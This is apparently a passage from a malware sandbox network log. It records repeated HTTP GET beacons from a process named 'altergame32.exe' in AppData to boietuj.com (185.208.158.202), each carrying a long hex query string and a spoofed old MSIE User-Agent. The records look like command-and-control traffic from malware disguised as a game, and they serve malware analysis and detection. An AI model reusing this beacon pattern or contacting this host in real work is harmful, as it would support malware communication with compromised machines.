                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                28 | 192.168.2.4 | 50032 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:46.790327072 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:47.498078108 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                29 | 192.168.2.4 | 50033 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:47.620803118 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:48.354685068 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                30 | 192.168.2.4 | 50034 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:48.479300976 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:49.183340073 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                31 | 192.168.2.4 | 50035 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:49.305936098 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:50.006700039 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                32 | 192.168.2.4 | 50036 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:50.135117054 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:50.849473000 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:50.956752062 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:51.338821888 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                33 | 192.168.2.4 | 50037 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:51.462987900 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:52.189471960 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:52.300765038 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:52.550549030 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:52.660830021 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:52.911196947 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:53.019896030 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:53.274570942 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                34 | 192.168.2.4 | 50038 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:53.399975061 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:54.114866972 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:54.222429991 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:54.469738960 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:54.582773924 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:54.962649107 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                35 | 192.168.2.4 | 50039 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:55.088346958 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:55.796256065 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                36 | 192.168.2.4 | 50040 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:55.915716887 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:56.638695955 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                37 | 192.168.2.4 | 50041 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:56.760502100 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:57.469749928 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                38 | 192.168.2.4 | 50042 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:03:58.039854050 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:58.719826937 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


Session ID: 39 | Source IP: 192.168.2.4 | Source Port: 50043 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:03:58.851417065 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:03:59.577845097 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:03:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 40 | Source IP: 192.168.2.4 | Source Port: 50044 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:03:59.701590061 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:00.427445889 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 41 | Source IP: 192.168.2.4 | Source Port: 50045 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:00.581823111 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:01.290733099 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 42 | Source IP: 192.168.2.4 | Source Port: 50046 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:01.695470095 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:02.423727036 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Nov 20, 2024 05:04:02.542746067 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:02.792447090 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 43 | Source IP: 192.168.2.4 | Source Port: 50047 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:02.922924995 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:03.640023947 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 50048 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:03.760540009 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:04.467097044 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 50049 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:04.589704037 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:05.296166897 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 50050 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
